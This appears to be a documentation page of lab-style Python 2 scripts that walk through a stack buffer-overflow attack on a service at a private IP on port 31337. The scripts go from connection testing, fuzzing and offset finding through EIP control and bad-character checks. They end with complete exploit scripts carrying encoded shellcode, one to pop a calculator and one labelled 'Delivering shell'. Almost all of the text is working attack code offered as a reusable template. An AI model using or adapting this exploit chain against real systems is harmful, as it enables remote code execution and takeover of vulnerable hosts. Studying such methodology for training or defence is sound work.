Scripts
BOF script sample methodology
#!/usr/bin/python
import socket
RHOST='192.168.132.128'
RPORT=31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "\nTesting..."
s.connect((RHOST,RPORT)) # connect to IP, POP3 port
s.send('String test1\n') # send username "test"
data = s.recv(1024) # receive reply
print data # print reply
s.send('String test2\n') # send password "test"
data = s.recv(1024) # receive reply
print data # print reply
s.close() # close socket
print "\nDone!"
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.128'
RPORT=31337
buffer=["A"]
counter=50
try:
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+50
for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
s.send(string+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.128'
RPORT=31337
buffer=""
buffer+=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9")
try:
print "Fuzzing PASS with a Pattern..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
print "-connected-"
s.send(buffer+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.128'
RPORT=31337
buffer="A"*146 + "BBBB"
try:
print "Fuzzing PASS with a Pattern..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
print "-connected-"
s.send(buffer+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.128'
RPORT=31337
filler = "A"*146
eip = "BBBB"
offset = "C"*4
buffer = filler + eip + offset
buffer +="D"*(1500-len(filler+eip+offset)) #trying ~1500
try:
print "Fuzzing PASS with a Pattern..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
print "-connected-"
s.send(buffer+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.128'
RPORT=31337
filler = "A"*146
eip = "BBBB"
offset = "C"*4
buffer = filler + eip + offset
buffer += (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
#bad: \x00 \x0a
try:
print "Fuzzing PASS with a Pattern..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
print "-connected-"
s.send(buffer+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.130'
RPORT=31337
filler = "A"*146
eip = "\xc3\x14\x04\x08"
offset = "\x90"*15
buffer = filler + eip + offset
buffer += b"\xdb\xc5\xb8\x8d\x08\xf9\x13\xd9\x74\x24\xf4\x5a"
buffer += b"\x2b\xc9\xb1\x31\x31\x42\x18\x03\x42\x18\x83\xc2"
buffer += b"\x89\xea\x0c\xef\x79\x68\xee\x10\x79\x0d\x66\xf5"
buffer += b"\x48\x0d\x1c\x7d\xfa\xbd\x56\xd3\xf6\x36\x3a\xc0"
buffer += b"\x8d\x3b\x93\xe7\x26\xf1\xc5\xc6\xb7\xaa\x36\x48"
buffer += b"\x3b\xb1\x6a\xaa\x02\x7a\x7f\xab\x43\x67\x72\xf9"
buffer += b"\x1c\xe3\x21\xee\x29\xb9\xf9\x85\x61\x2f\x7a\x79"
buffer += b"\x31\x4e\xab\x2c\x4a\x09\x6b\xce\x9f\x21\x22\xc8"
buffer += b"\xfc\x0c\xfc\x63\x36\xfa\xff\xa5\x07\x03\x53\x88"
buffer += b"\xa8\xf6\xad\xcc\x0e\xe9\xdb\x24\x6d\x94\xdb\xf2"
buffer += b"\x0c\x42\x69\xe1\xb6\x01\xc9\xcd\x47\xc5\x8c\x86"
buffer += b"\x4b\xa2\xdb\xc1\x4f\x35\x0f\x7a\x6b\xbe\xae\xad"
buffer += b"\xfa\x84\x94\x69\xa7\x5f\xb4\x28\x0d\x31\xc9\x2b"
buffer += b"\xee\xee\x6f\x27\x02\xfa\x1d\x6a\x48\xfd\x90\x10"
buffer += b"\x3e\xfd\xaa\x1a\x6e\x96\x9b\x91\xe1\xe1\x23\x70"
buffer += b"\x46\x0d\xc6\x51\xb2\xa6\x5f\x30\x7f\xab\x5f\xee"
buffer += b"\x43\xd2\xe3\x1b\x3b\x21\xfb\x69\x3e\x6d\xbb\x82"
buffer += b"\x32\xfe\x2e\xa5\xe1\xff\x7a\xc6\x64\x6c\xe6\x27"
buffer += b"\x03\x14\x8d\x37"
#bad: \x00 \x0a
try:
print "Poping Calc..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
print "-connected-"
s.send(buffer+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"#!/usr/bin/python
import socket
RHOST='192.168.132.130'
RPORT=31337
filler = "A"*146
eip = "\xc3\x14\x04\x08"
offset = "\x90"*15
buffer = filler + eip + offset
buffer += b"\xdb\xd0\xd9\x74\x24\xf4\xba\x39\xd7\xb6\xf1\x5e"
buffer += b"\x2b\xc9\xb1\x52\x31\x56\x17\x83\xee\xfc\x03\x6f"
buffer += b"\xc4\x54\x04\x73\x02\x1a\xe7\x8b\xd3\x7b\x61\x6e"
buffer += b"\xe2\xbb\x15\xfb\x55\x0c\x5d\xa9\x59\xe7\x33\x59"
buffer += b"\xe9\x85\x9b\x6e\x5a\x23\xfa\x41\x5b\x18\x3e\xc0"
buffer += b"\xdf\x63\x13\x22\xe1\xab\x66\x23\x26\xd1\x8b\x71"
buffer += b"\xff\x9d\x3e\x65\x74\xeb\x82\x0e\xc6\xfd\x82\xf3"
buffer += b"\x9f\xfc\xa3\xa2\x94\xa6\x63\x45\x78\xd3\x2d\x5d"
buffer += b"\x9d\xde\xe4\xd6\x55\x94\xf6\x3e\xa4\x55\x54\x7f"
buffer += b"\x08\xa4\xa4\xb8\xaf\x57\xd3\xb0\xd3\xea\xe4\x07"
buffer += b"\xa9\x30\x60\x93\x09\xb2\xd2\x7f\xab\x17\x84\xf4"
buffer += b"\xa7\xdc\xc2\x52\xa4\xe3\x07\xe9\xd0\x68\xa6\x3d"
buffer += b"\x51\x2a\x8d\x99\x39\xe8\xac\xb8\xe7\x5f\xd0\xda"
buffer += b"\x47\x3f\x74\x91\x6a\x54\x05\xf8\xe2\x99\x24\x02"
buffer += b"\xf3\xb5\x3f\x71\xc1\x1a\x94\x1d\x69\xd2\x32\xda"
buffer += b"\x8e\xc9\x83\x74\x71\xf2\xf3\x5d\xb6\xa6\xa3\xf5"
buffer += b"\x1f\xc7\x2f\x05\x9f\x12\xff\x55\x0f\xcd\x40\x05"
buffer += b"\xef\xbd\x28\x4f\xe0\xe2\x49\x70\x2a\x8b\xe0\x8b"
buffer += b"\xbd\x74\x5c\x17\xbc\x1d\x9f\x17\x8f\xe4\x16\xf1"
buffer += b"\x85\x06\x7f\xaa\x31\xbe\xda\x20\xa3\x3f\xf1\x4d"
buffer += b"\xe3\xb4\xf6\xb2\xaa\x3c\x72\xa0\x5b\xcd\xc9\x9a"
buffer += b"\xca\xd2\xe7\xb2\x91\x41\x6c\x42\xdf\x79\x3b\x15"
buffer += b"\x88\x4c\x32\xf3\x24\xf6\xec\xe1\xb4\x6e\xd6\xa1"
buffer += b"\x62\x53\xd9\x28\xe6\xef\xfd\x3a\x3e\xef\xb9\x6e"
buffer += b"\xee\xa6\x17\xd8\x48\x11\xd6\xb2\x02\xce\xb0\x52"
buffer += b"\xd2\x3c\x03\x24\xdb\x68\xf5\xc8\x6a\xc5\x40\xf7"
buffer += b"\x43\x81\x44\x80\xb9\x31\xaa\x5b\x7a\x51\x49\x49"
buffer += b"\x77\xfa\xd4\x18\x3a\x67\xe7\xf7\x79\x9e\x64\xfd"
buffer += b"\x01\x65\x74\x74\x07\x21\x32\x65\x75\x3a\xd7\x89"
buffer += b"\x2a\x3b\xf2"
#bad: \x00 \x0a
try:
print "Delivering shell..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((RHOST,RPORT))
print "-connected-"
s.send(buffer+'\n')
data = s.recv(1024)
s.close()
except:
print "--Could not connect--"Last updated
Was this helpful?